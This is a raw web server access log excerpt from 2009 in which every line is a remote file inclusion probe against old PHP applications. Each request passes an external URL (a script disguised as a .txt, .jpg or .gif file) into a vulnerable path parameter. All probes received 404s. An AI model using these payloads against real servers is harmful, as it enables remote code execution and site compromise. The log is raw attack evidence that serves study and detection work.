79.148.238.69 - - [30/Oct/2009:10:19:11 -0700] "GET /logs/access_080321.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:10:19:21 -0700] "GET /appserv/main.php?appserv_root=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:10:19:21 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:10:19:21 -0700] "GET /logs/access_081107.log%20%20//appserv/main.php?appserv_root=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.99.88.235 - - [30/Oct/2009:10:19:23 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
